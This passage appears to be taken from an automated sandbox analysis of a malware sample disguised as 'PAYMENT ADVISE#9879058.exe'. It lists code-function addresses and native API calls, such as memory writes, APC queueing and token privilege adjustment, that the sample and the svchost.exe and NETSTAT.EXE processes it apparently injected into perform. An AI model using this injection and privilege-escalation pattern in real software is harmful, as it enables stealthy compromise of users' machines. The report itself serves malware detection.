            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03994650 NtSuspendThread,LdrInitializeThunk,6_2_03994650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03992BA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03992BF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03992BE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992B60 NtClose,LdrInitializeThunk,6_2_03992B60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992AD0 NtReadFile,LdrInitializeThunk,6_2_03992AD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992AF0 NtWriteFile,LdrInitializeThunk,6_2_03992AF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992FB0 NtResumeThread,LdrInitializeThunk,6_2_03992FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992FE0 NtCreateFile,LdrInitializeThunk,6_2_03992FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992F30 NtCreateSection,LdrInitializeThunk,6_2_03992F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03992E80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03992EE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992DD0 NtDelayExecution,LdrInitializeThunk,6_2_03992DD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03992DF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03992D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03992D30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03992CA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03992C70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992C60 NtCreateKey,LdrInitializeThunk,6_2_03992C60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039935C0 NtCreateMutant,LdrInitializeThunk,6_2_039935C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039939B0 NtGetContextThread,LdrInitializeThunk,6_2_039939B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992B80 NtQueryInformationFile,6_2_03992B80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992AB0 NtWaitForSingleObject,6_2_03992AB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992F90 NtProtectVirtualMemory,6_2_03992F90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992FA0 NtQuerySection,6_2_03992FA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992F60 NtCreateProcessEx,6_2_03992F60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992EA0 NtAdjustPrivilegesToken,6_2_03992EA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992E30 NtWriteVirtualMemory,6_2_03992E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992DB0 NtEnumerateKey,6_2_03992DB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992D00 NtSetInformationFile,6_2_03992D00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992CC0 NtQueryVirtualMemory,6_2_03992CC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992CF0 NtOpenProcess,6_2_03992CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03992C00 NtQueryInformationProcess,6_2_03992C00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03993090 NtSetValueKey,6_2_03993090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03993010 NtOpenDirectoryObject,6_2_03993010
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03993D10 NtOpenProcessToken,6_2_03993D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03993D70 NtOpenThread,6_2_03993D70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03108FF0 NtCreateFile,6_2_03108FF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03109300 NtClose,6_2_03109300
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03109260 NtDeleteFile,6_2_03109260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03109160 NtReadFile,6_2_03109160
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03109460 NtAllocateVirtualMemory,6_2_03109460
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370F292 NtReadVirtualMemory,6_2_0370F292
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370F177 NtQueryInformationProcess,6_2_0370F177
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00490D700_2_00490D70
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_03FAAE600_2_03FAAE60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A131_2_00418A13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0331_2_0042F033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010E01_2_004010E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041024D1_2_0041024D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004102531_2_00410253
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012D01_2_004012D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416BE31_2_00416BE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004104731_2_00410473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004034D01_2_004034D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4F31_2_0040E4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027A01_2_004027A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA3521_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038003E61_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F01_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E02741_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C02C01_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C81581_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038001AA1_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA1181_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037301001_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F81CC1_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F41A21_2_037F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D20001_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037407701_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037647501_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C01_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C6E01_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038005911_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037405351_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F24461_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E44201_2_037E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EE4F61_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB401_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F6BD71_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA801_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037569621_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380A9A61_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A01_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374A8401_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037428401_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E8F01_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037268B81_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4F401_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760F301_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E2F301_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03782F281_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732FC81_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BEFA01_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740E591_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEE261_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEEDB1_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752E901_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FCE931_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DCD1F1_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374AD001_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373ADE01_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03758DBF1_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740C001_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730CF21_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0CB51_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372D34C1_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F132D1_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0378739A1_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375D2F01_2_0375D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E12ED1_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B2C01_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037452A01_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372F1721_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377516C1_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374B1B01_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380B16B1_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F70E91_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF0E01_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EF0CC1_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037470C01_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF7B01_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F16CC1_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F75711_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DD5B01_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037314601_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF43F1_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFB761_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B5BF01_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377DBF91_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FB801_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B3A6C1_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFA491_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7A461_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EDAC61_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DDAAC1_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03785AA01_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E1AA31_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037499501_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B9501_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D59101_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AD8001_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037438E01_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFF091_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD21_2_03703FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD51_2_03703FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFFB11_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03741F921_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03749EB01_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7D731_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F1D5A1_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03743D401_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FDC01_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B9C321_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFCF21_2_037FFCF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A203E66_2_03A203E6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0396E3F06_2_0396E3F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1A3526_2_03A1A352
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039E02C06_2_039E02C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A002746_2_03A00274
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A141A26_2_03A141A2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A201AA6_2_03A201AA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A181CC6_2_03A181CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039FA1186_2_039FA118
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039501006_2_03950100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039E81586_2_039E8158
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039F20006_2_039F2000
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0395C7C06_2_0395C7C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039847506_2_03984750
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039607706_2_03960770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397C6E06_2_0397C6E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A205916_2_03A20591
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039605356_2_03960535
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A0E4F66_2_03A0E4F6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A044206_2_03A04420
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A124466_2_03A12446
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A16BD76_2_03A16BD7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1AB406_2_03A1AB40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0395EA806_2_0395EA80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A2A9A66_2_03A2A9A6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039629A06_2_039629A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039769626_2_03976962
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039468B86_2_039468B8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0398E8F06_2_0398E8F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039628406_2_03962840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0396A8406_2_0396A840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039DEFA06_2_039DEFA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03952FC86_2_03952FC8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A02F306_2_03A02F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03980F306_2_03980F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039A2F286_2_039A2F28
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039D4F406_2_039D4F40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03972E906_2_03972E90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1CE936_2_03A1CE93
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1EEDB6_2_03A1EEDB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1EE266_2_03A1EE26
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03960E596_2_03960E59
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03978DBF6_2_03978DBF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0395ADE06_2_0395ADE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039FCD1F6_2_039FCD1F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0396AD006_2_0396AD00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A00CB56_2_03A00CB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03950CF26_2_03950CF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03960C006_2_03960C00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039A739A6_2_039A739A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1132D6_2_03A1132D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0394D34C6_2_0394D34C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039652A06_2_039652A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A012ED6_2_03A012ED
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397B2C06_2_0397B2C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397D2F06_2_0397D2F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0396B1B06_2_0396B1B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A2B16B6_2_03A2B16B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0394F1726_2_0394F172
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0399516C6_2_0399516C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1F0E06_2_03A1F0E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A170E96_2_03A170E9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039670C06_2_039670C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A0F0CC6_2_03A0F0CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1F7B06_2_03A1F7B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A116CC6_2_03A116CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039A56306_2_039A5630
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039FD5B06_2_039FD5B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A295C36_2_03A295C3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A175716_2_03A17571
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1F43F6_2_03A1F43F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039514606_2_03951460
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397FB806_2_0397FB80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0399DBF96_2_0399DBF9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039D5BF06_2_039D5BF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1FB766_2_03A1FB76
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A01AA36_2_03A01AA3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039FDAAC6_2_039FDAAC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039A5AA06_2_039A5AA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A0DAC66_2_03A0DAC6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A17A466_2_03A17A46
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1FA496_2_03A1FA49
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039D3A6C6_2_039D3A6C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039F59106_2_039F5910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039699506_2_03969950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397B9506_2_0397B950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039638E06_2_039638E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039CD8006_2_039CD800
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03961F926_2_03961F92
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1FFB16_2_03A1FFB1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03923FD26_2_03923FD2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03923FD56_2_03923FD5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1FF096_2_03A1FF09
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03969EB06_2_03969EB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0397FDC06_2_0397FDC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A17D736_2_03A17D73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03963D406_2_03963D40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A11D5A6_2_03A11D5A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03A1FCF26_2_03A1FCF2
